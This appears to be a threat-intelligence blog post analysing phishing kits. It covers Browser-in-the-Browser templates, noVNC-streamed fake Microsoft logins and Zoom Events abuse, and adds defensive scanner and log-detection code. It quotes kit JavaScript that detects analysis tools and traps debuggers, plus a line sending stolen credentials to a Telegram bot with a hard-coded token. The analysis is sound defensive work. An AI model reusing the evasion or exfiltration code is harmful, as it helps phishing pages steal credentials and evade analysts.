Author: Aarsh Jawa
As cybersecurity platforms have become increasingly sophisticated and more available to users, so have pay-to-play cybercrime opportunities like Phishing As a Service (PHAAS).
According to SecurityBrief, nearly 70% of all phishing attacks that have occurred in 2025 have been delivered through PHAAS models.
For security analysts, detecting and dismantling the payload in PHAAS campaigns is no longer a simple task. Threat actors are increasingly relying on client-side evasion techniques to stay ahead of both automated detection systems and human investigators. A notable method growing in popularity is the use of JavaScript-based anti-analysis scripts: small but effective bits of code embedded in phishing pages, fake tech support sites, and malicious redirects.
Recently, Doppel’s Threat Intelligence team observed these scripts being used to detect environments associated with analysis, such as headless browsers, proxy tools like Burp Suite, and actions like opening DevTools or viewing page source. Once any such activity is identified, the site immediately redirects the user to a blank page or disables further interaction, blocking access before any deeper inspection can occur.
This article examines how these scripts operate, their role in phishing infrastructure, and why defenders must understand these evasion layers that activate before malware ever touches the endpoint.
In recent phishing campaigns, threat actors are layering multiple evasion techniques to increase stealth and reduce the chances of detection. These aren’t just minor obfuscation tricks; they’re deliberate, effective methods designed to frustrate both human analysts and automated security tooling.
For our intelligence team, the real breakthrough came when we traced the origins of this evasion script.
Upon dissecting the structure and obfuscation patterns, we discovered that the phishing kit was being distributed via a public GitHub repository. The repository contained modular components that threat actors could easily customize, including fake login pages, wallet prompts, and obfuscated JavaScript evasion logic. The same logic we’ve been observing in the wild was readily accessible, well-documented, and updated frequently, suggesting that this kit is not only used in active campaigns but likely maintained for broader use across phishing-as-a-service operations.
This GitHub-hosted kit explains the consistency we’ve seen across unrelated phishing domains using identical evasion tactics. It also highlights how even advanced techniques are increasingly packaged and commoditized, lowering the bar for attackers to implement sophisticated detection countermeasures.
The GitHub repo hosting the phishing kit also included a Browser-in-the-Browser (BitB) template, allowing threat actors to mimic a real browser window within the page. This trick makes the fake login prompt look more authentic and helps bypass user suspicion and some automated detection tools.
Key Indicators:
Risk: High – this kit is operational, customizable, and convincing, and particularly effective against less technically aware users.
Workflow
Victim lands on a phishing page, e.g., login.html.
These are written to /opt/O365-BITB/creds.txt.
Instead of serving phishing pages directly, some actors now host phishing UIs inside virtual desktop environments using noVNC. The content (fake login forms, wallet drains) is rendered within a VNC session streamed to the victim’s browser. This approach:
In this campaign, the phishing infrastructure doesn’t directly serve static HTML phishing pages. Instead, it deploys a virtual desktop environment using noVNC, exposing a fake login panel (e.g., Microsoft or wallet login) inside the VNC stream.
This is the actual HTML source captured from a live noVNC-based phishing campaign.
Detection Evasion Benefits:
Once the noVNC session is fully established, this is the phishing interface delivered to the victim: a pixel-perfect replica of Microsoft’s official login screen. From the branding and font to the “Sign-in options” link, everything is crafted to reduce suspicion and harvest credentials with maximum believability.
The script in these websites is a JavaScript-based anti-analysis and anti-debugging defense commonly used in phishing kits, malicious landing pages, or scam sites to evade manual inspection and automated tools.
Here’s a detailed breakdown of what’s happening:
1. Bot/Tool Detection & Redirection
// Automated browsers (Selenium, Puppeteer, headless Chrome) expose navigator.webdriver;
// PhantomJS injects window.callPhantom / window._phantom; an analyst proxying through
// Burp may leave "Burp" in the User-Agent. Any hit sends the visitor to a blank page.
if (
  navigator.webdriver ||
  window.callPhantom ||
  window._phantom ||
  navigator.userAgent.includes("Burp")
) {
  window.location.href = "about:blank";
  return; // the excerpt runs inside the kit's wrapper function, so nothing else executes
}
Purpose:
Motivation:
Evade:
2. Key Combination Blocking
// Table of blocked key combinations (contents elided in the capture); the helper
// TQnTJznKKP (not shown) tests each keydown event against it.
const BhYjvUYWwE = [ ... ]; // Key code shortcuts like Ctrl+Shift+I, etc.
document.addEventListener("keydown", (evt) => {
  if (TQnTJznKKP(evt)) {
    evt.preventDefault(); // swallow the shortcut so DevTools / view-source never open
    return false;
  }
});
Blocks developer/debugger-related shortcuts:
Motivation:
Prevent analysts from opening developer tools to inspect DOM, JS, or network activity.
3. Context Menu Blocking
// Suppress the right-click menu, removing the "Inspect" and "View page source" entries.
document.addEventListener("contextmenu", (evt) => {
  evt.preventDefault();
  return false;
});
Prevents:
Motivation:
Hinders non-technical users from easily exploring the page.
4. Debugger Trap with performance.now()
// Every 100 ms, time a `debugger` statement. With DevTools closed it is a no-op and
// the two timestamps differ by microseconds; with DevTools open the statement pauses
// execution, so the gap exceeds 100 ms on the first tick. IttHmVWiNm and pmzZuLqjue
// are state flags whose declarations are not in this excerpt; they make the redirect fire once.
setInterval(() => {
  const start = performance.now();
  debugger;
  const end = performance.now();
  if (end - start > 100 && !IttHmVWiNm) {
    pmzZuLqjue = true;
    IttHmVWiNm = true;
    window.location.replace("https://www.etsy.com"); // bounce the analyst to a benign site
  }
}, 100);
Behavior:
Motivation:
To catch anyone using DevTools or breakpoints to investigate the page. It’s meant to frustrate those attempting to reverse engineer the attack.
This kind of aggressive evasion is typical in phishing, scams, or malware loader sites, especially those mimicking login portals, wallet apps, or payment processors.
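As an added example (not code from the kit or from Doppel's tooling), the following static scanner flags the four anti-analysis patterns walked through above in a page's JavaScript, so a suspected phishing page can be triaged offline; the signature table, weights and both sample scripts are constructed for this example.

```javascript
// Added example (not from the phishing kit or Doppel's tooling): a static scanner
// that flags the anti-analysis patterns discussed above in a page's JavaScript, for
// offline triage of a suspected phishing page. Signatures and samples are constructed.

const SIGNATURES = [
  { id: "webdriver-check",   weight: 2, re: /navigator\.webdriver/ },
  { id: "phantom-check",     weight: 2, re: /window\.(callPhantom|_phantom)\b/ },
  { id: "burp-ua-check",     weight: 3, re: /userAgent\.(includes|indexOf|match)\(\s*["']Burp["']/ },
  { id: "blank-redirect",    weight: 2, re: /location\.href\s*=\s*["']about:blank["']/ },
  { id: "keydown-block",     weight: 1, re: /addEventListener\(\s*["']keydown["'][\s\S]{0,200}?preventDefault/ },
  { id: "contextmenu-block", weight: 1, re: /addEventListener\(\s*["']contextmenu["'][\s\S]{0,120}?preventDefault/ },
  { id: "debugger-timing",   weight: 3, re: /performance\.now\(\)[\s\S]{0,80}?\bdebugger\b[\s\S]{0,80}?performance\.now\(\)/ },
];

// Scan one script body: returns matched signature ids, a weighted score and a verdict.
// Some hits are benign on their own (a form may preventDefault on Enter); the
// combination, and especially the timing trap, is what marks an anti-analysis layer.
function scanScript(source) {
  const matched = SIGNATURES.filter((s) => s.re.test(source));
  const score = matched.reduce((sum, s) => sum + s.weight, 0);
  const verdict = score >= 5 ? "anti-analysis" : score > 0 ? "low" : "clean";
  return { hits: matched.map((s) => s.id), score, verdict };
}

// Constructed sample modelled on the excerpts above (identifiers randomised like the kit's).
const SAMPLE = `(function () {
  if (navigator.webdriver || window.callPhantom || window._phantom ||
      navigator.userAgent.includes("Burp")) { window.location.href = "about:blank"; return; }
  document.addEventListener("keydown", (evt) => { if (xQ(evt)) { evt.preventDefault(); return false; } });
  document.addEventListener("contextmenu", (evt) => { evt.preventDefault(); return false; });
  setInterval(() => { const s = performance.now(); debugger; const e = performance.now();
    if (e - s > 100) { window.location.replace("https://example.invalid/"); } }, 100);
})();`;

// A benign page that also intercepts keydown, to show the scoring does not over-trigger.
const BENIGN = `document.addEventListener("keydown", (e) => { if (e.key === "Enter") { e.preventDefault(); submit(); } });`;

console.log(scanScript(SAMPLE)); // score: 14, verdict: "anti-analysis"
console.log(scanScript(BENIGN)); // score: 1, verdict: "low"
```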
These blocking techniques, like disabling DevTools, detecting Burp Suite, and setting debugger traps, have been observed on phishing sites that recently surfaced in campaigns exploiting legitimate Zoom Events infrastructure.
These attacks typically begin with emails from noreply-zoomevents@zoom.us, urging recipients to “View file” or “Download Desktop App Now.” The initial link points to hxxps://docs.zoom.us/doc/, which then redirects users either to a browser-based AitM (Adversary-in-the-Middle) phishing site employing the evasion tricks mentioned above, or to a malicious download.
This campaign isn’t isolated; similar infrastructure and domain naming conventions were observed in phishing waves last year as well. The attackers consistently use keywords like office, microsoft, or login in subdomains or root domains to lend legitimacy and mimic Microsoft-branded services.
Examples from prior phishing campaigns include:
This tactic increases trust among victims and improves social engineering effectiveness, especially when paired with official branding, fonts, and favicons from Microsoft’s CDN.
In another campaign, we found a phishing kit exfiltrating stolen Microsoft credentials directly to a Telegram bot. Instead of relying on backend servers, it used Telegram’s public API, making takedown harder and detection trickier. The fake login page looked convincing, used a clean UI with logos from Firebase, and sent credentials + IP via AJAX the moment a user hit “Sign In.” It’s a simple yet effective method that’s growing more common in modern phishing kits.
Credential Exfiltration via Telegram API
// Exfiltration is a single request to Telegram's Bot API ($.ajax defaults to GET):
// the bot token (bot<id>:<secret>) and destination chat_id are hard-coded in the page,
// and the elided text parameter carries the captured credentials and the victim's IP.
$.ajax({
  url: `https://api.telegram.org/bot7505850519:AAG-gm1DwAcpgfKeAXL3M3rl1DXK8D9B1a0/sendMessage?chat_id=6392148304&text=...`
});
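An added example, not part of the original post or the kit: detection logic for this exfiltration pattern run over constructed web-proxy log lines, assuming a JSON-per-line format with ts, src, url and referer fields (the bot token value is a placeholder, not the one above).

```javascript
// Added example (not from the kit or Doppel's tooling): flag browser requests to the
// Telegram Bot API sendMessage/sendDocument endpoints in web-proxy logs, mask the token,
// and note when the text parameter looks like credentials. Log format and token are constructed.

const BOT_CALL = /api\.telegram\.org\/bot(\d{8,10}):([A-Za-z0-9_-]{35})\/(sendMessage|sendDocument)/;
const CRED_HINT = /\b(pass(word|wd)?|pwd|email|login|user(name)?)\b/i;

// Inspect one JSON log line; returns a finding or null.
function inspectProxyLine(line) {
  let rec;
  try { rec = JSON.parse(line); } catch { return null; } // skip malformed lines
  const m = BOT_CALL.exec(rec.url || "");
  if (!m) return null;
  const [, botId, secret, apiMethod] = m;
  const url = new URL(rec.url);
  const text = url.searchParams.get("text") || ""; // URL-decoded message body
  return {
    ts: rec.ts,
    src: rec.src,
    referer: rec.referer || "",
    apiMethod,
    botId,
    tokenMasked: `${botId}:${secret.slice(0, 4)}...${secret.slice(-3)}`, // never log the full secret
    chatId: url.searchParams.get("chat_id") || "",
    looksLikeCreds: CRED_HINT.test(text),
  };
}

function detectTelegramExfil(lines) {
  return lines.map(inspectProxyLine).filter(Boolean);
}

// Constructed sample: one exfil request from a lookalike login page, two benign requests.
const FAKE_SECRET = "AA" + "x".repeat(33); // mimics the 35-character secret part of a token
const SAMPLE_LOG = [
  `{"ts":"2025-06-01T10:02:11Z","src":"10.0.0.15","url":"https://api.telegram.org/bot1234567890:${FAKE_SECRET}/sendMessage?chat_id=111222333&text=Email%3Auser%40example.com%20Pass%3Ahunter2%20IP%3A10.0.0.15","referer":"https://login-office-secure.example/"}`,
  `{"ts":"2025-06-01T10:02:12Z","src":"10.0.0.15","url":"https://outlook.live.com/mail/0/inbox","referer":"https://login-office-secure.example/"}`,
  `{"ts":"2025-06-01T10:03:40Z","src":"10.0.0.22","url":"https://web.telegram.org/a/","referer":""}`,
];

console.log(detectTelegramExfil(SAMPLE_LOG)); // one finding, chatId "111222333", looksLikeCreds true
```

The referer of a flagged request is the page to investigate; the masked botId alone is enough to pivot across other users' traffic without retaining the secret.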
Fake Error Handling + Success Page
// count tracks the victim's form submissions. Until it reaches 2 the kit shows its
// fake "wrong password" panel (#div2); on the second submission it swaps in the
// success panel (#div3) and, after half a second, sends the victim to the real
// Outlook inbox so the login appears to have worked.
if (count >= 2) {
  $("#div2").hide();
  $("#div3").show();
  setTimeout(() => {
    window.location.replace("https://outlook.live.com/mail/0/inbox");
  }, 500);
}
Indicators of Compromise: